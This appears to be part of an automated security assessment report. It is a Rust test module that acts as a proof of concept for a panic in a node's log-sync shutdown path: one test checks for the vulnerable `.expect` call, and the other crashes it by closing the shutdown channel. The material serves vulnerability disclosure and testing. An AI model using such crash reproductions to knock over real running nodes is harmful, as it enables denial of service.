#[cfg(test)]
mod tests {
use super::*;
use anyhow::anyhow;
use futures::channel::mpsc;
use task_executor::ShutdownReason;
/// Confirms the vulnerable pattern exists in the target file.
#[test]
fn source_contains_expect_on_shutdown_send() {
// Path relative to this PoC crate.
const SRC: &str = include_str!("../../node/log_entry_sync/src/sync_manager/mod.rs");
assert!(
SRC.contains(r#".expect("shutdown send error")"#),
"target file no longer contains `.expect(\"shutdown send error\")`"
);
assert!(
SRC.contains(r#"try_send(ShutdownReason::Failure("log sync failure"))"#),
"target file no longer contains try_send(Failure(\"log sync failure\")) pattern"
);
}
/// Runnable crash reproduction: if the shutdown receiver is dropped/closed,
/// `try_send(..).expect("shutdown send error")` panics.
#[tokio::test]
#[should_panic(expected = "shutdown send error")]
async fn panic_on_closed_shutdown_channel() {
let (mut shutdown_sender, shutdown_receiver) = mpsc::channel::<ShutdownReason>(1);
// Simulate shutdown already underway: receiver is gone, channel is closed.
drop(shutdown_receiver);
let _ = run_and_log(
move || {
shutdown_sender
.try_send(ShutdownReason::Failure("log sync failure"))
.expect("shutdown send error")
},
async { Err::<(), _>(anyhow!("provider induced failure")) },
)
.await;
}
}
Recommended Fix
No suggested diff provided for this vulnerability.
This assessment was conducted using KAI's automated security analysis platform. Each verified vulnerability includes proof-of-concept code demonstrating exploitability and recommended fixes to address the identified security issues.